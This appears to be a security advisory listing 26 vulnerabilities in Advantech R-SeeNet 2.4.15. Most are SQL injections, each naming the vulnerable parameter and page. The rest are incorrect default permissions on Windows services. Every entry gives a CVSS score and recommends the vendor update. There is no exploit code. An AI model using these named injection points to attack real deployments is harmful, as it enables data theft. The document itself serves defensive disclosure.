Multiple vulnerabilities in Advantech R-SeeNet
| Risk | Medium |
| Patch available | YES |
| Number of vulnerabilities | 26 |
| CVE-ID | CVE-2021-21918 CVE-2021-21919 CVE-2021-21926 CVE-2021-21937 CVE-2021-21936 CVE-2021-21935 CVE-2021-21934 CVE-2021-21933 CVE-2021-21932 CVE-2021-21931 CVE-2021-21930 CVE-2021-21929 CVE-2021-21928 CVE-2021-21927 CVE-2021-21925 CVE-2021-21924 CVE-2021-21923 CVE-2021-21922 CVE-2021-21921 CVE-2021-21920 CVE-2021-21917 CVE-2021-21916 CVE-2021-21915 CVE-2021-21912 CVE-2021-21911 CVE-2021-21910 |
| CWE-ID | CWE-89 CWE-276 |
| Exploitation vector | Network |
| Public exploit | N/A |
| Vulnerable software Subscribe |
R-SeeNet Server applications / Other server solutions |
| Vendor | Advantech Co., Ltd |
Security Bulletin
This security bulletin contains information about 26 vulnerabilities.
1) SQL injection
EUVDB-ID: #VU58297
Risk: Medium
CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-21918
CWE-ID:
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Exploit availability: No
DescriptionThe vulnerability allows a remote attacker to execute arbitrary SQL queries in database.
The vulnerability exists due to insufficient sanitization of user-supplied data in the "name_filter" parameter in "company_list" page. A remote authenticated attacker can send a specially crafted request to the affected application and gain access to sensitive information on the system.
MitigationInstall updates from vendor's website.
Vulnerable software versionsR-SeeNet: 2.4.15
External linkshttp://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1364icsa-21-348-01
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
2) SQL injection
EUVDB-ID: #VU58298
Risk: Medium
CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-21919
CWE-ID:
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Exploit availability: No
DescriptionThe vulnerability allows a remote attacker to execute arbitrary SQL queries in database.
The vulnerability exists due to insufficient sanitization of user-supplied data in the "ord" parameter in "company_list" page. A remote authenticated attacker can send a specially crafted request to the affected application and gain access to sensitive information on the system.
MitigationInstall updates from vendor's website.
Vulnerable software versionsR-SeeNet: 2.4.15
External linkshttp://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1364icsa-21-348-01
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
3) SQL injection
EUVDB-ID: #VU58327
Risk: Medium
CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-21926
CWE-ID:
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Exploit availability: No
DescriptionThe vulnerability allows a remote attacker to execute arbitrary SQL queries in database.
The vulnerability exists due to insufficient sanitization of user-supplied data in the "health_filter" parameter in the "sn_filter" page. A remote authenticated attacker can send a specially crafted request to the affected application and gain access to sensitive information on the system.
MitigationInstall updates from vendor's website.
Vulnerable software versionsR-SeeNet: 2.4.15
External linkshttp://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366icsa-21-348-01
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
4) SQL injection
EUVDB-ID: #VU58326
Risk: Medium
CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-21937
CWE-ID:
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Exploit availability: No
DescriptionThe vulnerability allows a remote attacker to execute arbitrary SQL queries in database.
The vulnerability exists due to insufficient sanitization of user-supplied data in the "host_alt_filter" parameter in the "sn_filter" page. A remote authenticated attacker can send a specially crafted request to the affected application and gain access to sensitive information on the system.
MitigationInstall updates from vendor's website.
Vulnerable software versionsR-SeeNet: 2.4.15
External linkshttp://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366icsa-21-348-01
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
5) SQL injection
EUVDB-ID: #VU58325
Risk: Medium
CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-21936
CWE-ID:
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Exploit availability: No
DescriptionThe vulnerability allows a remote attacker to execute arbitrary SQL queries in database.
The vulnerability exists due to insufficient sanitization of user-supplied data in the "health_alt_filter" parameter in the "sn_filter" page. A remote authenticated attacker can send a specially crafted request to the affected application and gain access to sensitive information on the system.
MitigationInstall updates from vendor's website.
Vulnerable software versionsR-SeeNet: 2.4.15
External linkshttp://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366icsa-21-348-01
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
6) SQL injection
EUVDB-ID: #VU58324
Risk: Medium
CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-21935
CWE-ID:
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Exploit availability: No
DescriptionThe vulnerability allows a remote attacker to execute arbitrary SQL queries in database.
The vulnerability exists due to insufficient sanitization of user-supplied data in the "host_alt_filter2" parameter in the "sn_filter" page. A remote authenticated attacker can send a specially crafted request to the affected application and gain access to sensitive information on the system.
MitigationInstall updates from vendor's website.
Vulnerable software versionsR-SeeNet: 2.4.15
External linkshttp://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366icsa-21-348-01
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
7) SQL injection
EUVDB-ID: #VU58323
Risk: Medium
CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-21934
CWE-ID:
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Exploit availability: No
DescriptionThe vulnerability allows a remote attacker to execute arbitrary SQL queries in database.
The vulnerability exists due to insufficient sanitization of user-supplied data in the "imei_filter" parameter in the "sn_filter" page. A remote authenticated attacker can send a specially crafted request to the affected application and gain access to sensitive information on the system.
MitigationInstall updates from vendor's website.
Vulnerable software versionsR-SeeNet: 2.4.15
External linkshttp://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366icsa-21-348-01
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
8) SQL injection
EUVDB-ID: #VU58322
Risk: Medium
CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-21933
CWE-ID:
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Exploit availability: No
DescriptionThe vulnerability allows a remote attacker to execute arbitrary SQL queries in database.
The vulnerability exists due to insufficient sanitization of user-supplied data in the "esn_filter" parameter in the "sn_filter" page. A remote authenticated attacker can send a specially crafted request to the affected application and gain access to sensitive information on the system.
MitigationInstall updates from vendor's website.
Vulnerable software versionsR-SeeNet: 2.4.15
External linkshttp://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366icsa-21-348-01
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
9) SQL injection
EUVDB-ID: #VU58321
Risk: Medium
CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-21932
CWE-ID:
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Exploit availability: No
DescriptionThe vulnerability allows a remote attacker to execute arbitrary SQL queries in database.
The vulnerability exists due to insufficient sanitization of user-supplied data in the "name_filter" parameter in the "sn_filter" page. A remote authenticated attacker can send a specially crafted request to the affected application and gain access to sensitive information on the system.
MitigationInstall updates from vendor's website.
Vulnerable software versionsR-SeeNet: 2.4.15
External linkshttp://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366icsa-21-348-01
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
10) SQL injection
EUVDB-ID: #VU58320
Risk: Medium
CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-21931
CWE-ID:
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Exploit availability: No
DescriptionThe vulnerability allows a remote attacker to execute arbitrary SQL queries in database.
The vulnerability exists due to insufficient sanitization of user-supplied data in the "stat_filter" parameter in the "sn_filter" page. A remote authenticated attacker can send a specially crafted request to the affected application and gain access to sensitive information on the system.
MitigationInstall updates from vendor's website.
Vulnerable software versionsR-SeeNet: 2.4.15
External linkshttp://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366icsa-21-348-01
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
11) SQL injection
EUVDB-ID: #VU58319
Risk: Medium
CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-21930
CWE-ID:
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Exploit availability: No
DescriptionThe vulnerability allows a remote attacker to execute arbitrary SQL queries in database.
The vulnerability exists due to insufficient sanitization of user-supplied data in the "prod_filter" parameter in the "sn_filter" page. A remote authenticated attacker can send a specially crafted request to the affected application and gain access to sensitive information on the system.
MitigationInstall updates from vendor's website.
Vulnerable software versionsR-SeeNet: 2.4.15
External linkshttp://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366icsa-21-348-01
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
12) SQL injection
EUVDB-ID: #VU58318
Risk: Medium
CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-21929
CWE-ID:
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Exploit availability: No
DescriptionThe vulnerability allows a remote attacker to execute arbitrary SQL queries in database.
The vulnerability exists due to insufficient sanitization of user-supplied data in the "prod_filter" parameter in the "mac_filter" page. A remote authenticated attacker can send a specially crafted request to the affected application and gain access to sensitive information on the system.
MitigationInstall updates from vendor's website.
Vulnerable software versionsR-SeeNet: 2.4.15
External linkshttp://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366icsa-21-348-01
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
13) SQL injection
EUVDB-ID: #VU58317
Risk: Medium
CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-21928
CWE-ID:
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Exploit availability: No
DescriptionThe vulnerability allows a remote attacker to execute arbitrary SQL queries in database.
The vulnerability exists due to insufficient sanitization of user-supplied data in the "loc_filter" parameter in the "mac_filter" page. A remote authenticated attacker can send a specially crafted request to the affected application and gain access to sensitive information on the system.
MitigationInstall updates from vendor's website.
Vulnerable software versionsR-SeeNet: 2.4.15
External linkshttp://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366icsa-21-348-01
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
14) SQL injection
EUVDB-ID: #VU58316
Risk: Medium
CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-21927
CWE-ID:
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Exploit availability: No
DescriptionThe vulnerability allows a remote attacker to execute arbitrary SQL queries in database.
The vulnerability exists due to insufficient sanitization of user-supplied data in the "loc_filter" parameter in the "device_list" page. A remote authenticated attacker can send a specially crafted request to the affected application and gain access to sensitive information on the system.
MitigationInstall updates from vendor's website.
Vulnerable software versionsR-SeeNet: 2.4.15
External linkshttp://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366icsa-21-348-01
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
15) SQL injection
EUVDB-ID: #VU58315
Risk: Medium
CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-21925
CWE-ID:
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Exploit availability: No
DescriptionThe vulnerability allows a remote attacker to execute arbitrary SQL queries in database.
The vulnerability exists due to insufficient sanitization of user-supplied data in the "firm_filter" parameter in the "device_list" page. A remote authenticated attacker can send a specially crafted request to the affected application and gain access to sensitive information on the system.
MitigationInstall updates from vendor's website.
Vulnerable software versionsR-SeeNet: 2.4.15
External linkshttp://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366icsa-21-348-01
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
16) SQL injection
EUVDB-ID: #VU58314
Risk: Medium
CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-21924
CWE-ID:
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Exploit availability: No
DescriptionThe vulnerability allows a remote attacker to execute arbitrary SQL queries in database.
The vulnerability exists due to insufficient sanitization of user-supplied data in the "desc_filter" parameter in the "device_list" page. A remote authenticated attacker can send a specially crafted request to the affected application and gain access to sensitive information on the system.
MitigationInstall updates from vendor's website.
Vulnerable software versionsR-SeeNet: 2.4.15
External linkshttp://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1366icsa-21-348-01
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
17) SQL injection
EUVDB-ID: #VU58313
Risk: Medium
CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-21923
CWE-ID:
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Exploit availability: No
DescriptionThe vulnerability allows a remote attacker to execute arbitrary SQL queries in database.
The vulnerability exists due to insufficient sanitization of user-supplied data in the "company_filter" parameter in "user_list" page. A remote attacker can send a specially crafted request to the affected application and gain access to sensitive information on the system.
MitigationInstall updates from vendor's website.
Vulnerable software versionsR-SeeNet: 2.4.15
External linkshttp://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1365icsa-21-348-01
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
18) SQL injection
EUVDB-ID: #VU58312
Risk: Medium
CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-21922
CWE-ID:
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Exploit availability: No
DescriptionThe vulnerability allows a remote attacker to execute arbitrary SQL queries in database.
The vulnerability exists due to insufficient sanitization of user-supplied data in the "username_filter" parameter in "user_list" page. A remote attacker can send a specially crafted request to the affected application and gain access to sensitive information on the system.
MitigationInstall updates from vendor's website.
Vulnerable software versionsR-SeeNet: 2.4.15
External linkshttp://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1365icsa-21-348-01
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
19) SQL injection
EUVDB-ID: #VU58311
Risk: Medium
CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-21921
CWE-ID:
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Exploit availability: No
DescriptionThe vulnerability allows a remote attacker to execute arbitrary SQL queries in database.
The vulnerability exists due to insufficient sanitization of user-supplied data in the "name_filter" parameter in "user_list" page. A remote attacker can send a specially crafted request to the affected application and gain access to sensitive information on the system.
MitigationInstall updates from vendor's website.
Vulnerable software versionsR-SeeNet: 2.4.15
External linkshttp://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1365icsa-21-348-01
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
20) SQL injection
EUVDB-ID: #VU58310
Risk: Medium
CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-21920
CWE-ID:
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Exploit availability: No
DescriptionThe vulnerability allows a remote attacker to execute arbitrary SQL queries in database.
The vulnerability exists due to insufficient sanitization of user-supplied data in the "surname_filter" parameter in "user_list" page. A remote attacker can send a specially crafted request to the affected application and gain access to sensitive information on the system.
MitigationInstall updates from vendor's website.
Vulnerable software versionsR-SeeNet: 2.4.15
External linkshttp://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1365icsa-21-348-01
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
21) SQL injection
EUVDB-ID: #VU58306
Risk: Medium
CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-21917
CWE-ID:
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Exploit availability: No
DescriptionThe vulnerability allows a remote attacker to execute arbitrary SQL queries in database.
The vulnerability exists due to insufficient sanitization of user-supplied data in the "ord" parameter in group_list page. A remote authenticated attacker can send a specially crafted request to the affected application and gain access to sensitive information on the system.
MitigationInstall updates from vendor's website.
Vulnerable software versionsR-SeeNet: 2.4.15
External linkshttp://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1363icsa-21-348-01
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
22) SQL injection
EUVDB-ID: #VU58303
Risk: Medium
CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-21916
CWE-ID:
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Exploit availability: No
DescriptionThe vulnerability allows a remote attacker to execute arbitrary SQL queries in database.
The vulnerability exists due to insufficient sanitization of user-supplied data in the "description_filter" parameter in group_list page. A remote authenticated attacker can send a specially crafted request to the affected application and gain access to sensitive information on the system.
MitigationInstall updates from vendor's website.
Vulnerable software versionsR-SeeNet: 2.4.15
External linkshttp://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1363icsa-21-348-01
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
23) SQL injection
EUVDB-ID: #VU58302
Risk: Medium
CVSSv3.1: 5.7 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-21915
CWE-ID:
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Exploit availability: No
DescriptionThe vulnerability allows a remote attacker to execute arbitrary SQL queries in database.
The vulnerability exists due to insufficient sanitization of user-supplied data in the "company_filter" parameter in group_list page. A remote authenticated attacker can send a specially crafted request to the affected application and gain access to sensitive information on the system.
MitigationInstall updates from vendor's website.
Vulnerable software versionsR-SeeNet: 2.4.15
External linkshttp://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1363icsa-21-348-01
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
24) Incorrect default permissions
EUVDB-ID: #VU58301
Risk: Low
CVSSv3.1: 7.7 [CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-21912
CWE-ID:
CWE-276 - Incorrect Default Permissions
Exploit availability: No
DescriptionThe vulnerability allows a local user to escalate privileges on the system.
The vulnerability exists due to incorrect default permissions in the Windows version of installation within the "Apache2.2" service binary file in the directory. A local user with access to the system can view contents of files and directories or modify them.
MitigationInstall updates from vendor's website.
Vulnerable software versionsR-SeeNet: 2.4.15
External linkshttp://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1360icsa-21-348-01
Q & A
Can this vulnerability be exploited remotely?
No. This vulnerability can be exploited locally. The attacker should have authentication credentials and successfully authenticate on the system.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
25) Incorrect default permissions
EUVDB-ID: #VU58300
Risk: Low
CVSSv3.1: 7.7 [CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-21911
CWE-ID:
CWE-276 - Incorrect Default Permissions
Exploit availability: No
DescriptionThe vulnerability allows a local user to escalate privileges on the system.
The vulnerability exists due to incorrect default permissions in the Windows version of installation within the "SnmpMonSvs" service binary file in the directory. A local user with access to the system can view contents of files and directories or modify them.
MitigationInstall updates from vendor's website.
Vulnerable software versionsR-SeeNet: 2.4.15
External linkshttp://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1360icsa-21-348-01
Q & A
Can this vulnerability be exploited remotely?
No. This vulnerability can be exploited locally. The attacker should have authentication credentials and successfully authenticate on the system.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
26) Incorrect default permissions
EUVDB-ID: #VU58299
Risk: Low
CVSSv3.1: 7.7 [CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C]
CVE-ID: CVE-2021-21910
CWE-ID:
CWE-276 - Incorrect Default Permissions
Exploit availability: No
DescriptionThe vulnerability allows a local user to escalate privileges on the system.
The vulnerability exists due to incorrect default permissions in the Windows version of installation within the "mysql" service. A local user with access to the system can view contents of files and directories or modify them.
MitigationInstall updates from vendor's website.
Vulnerable software versionsR-SeeNet: 2.4.15
External linkshttp://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1360icsa-21-348-01
Q & A
Can this vulnerability be exploited remotely?
No. This vulnerability can be exploited locally. The attacker should have authentication credentials and successfully authenticate on the system.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
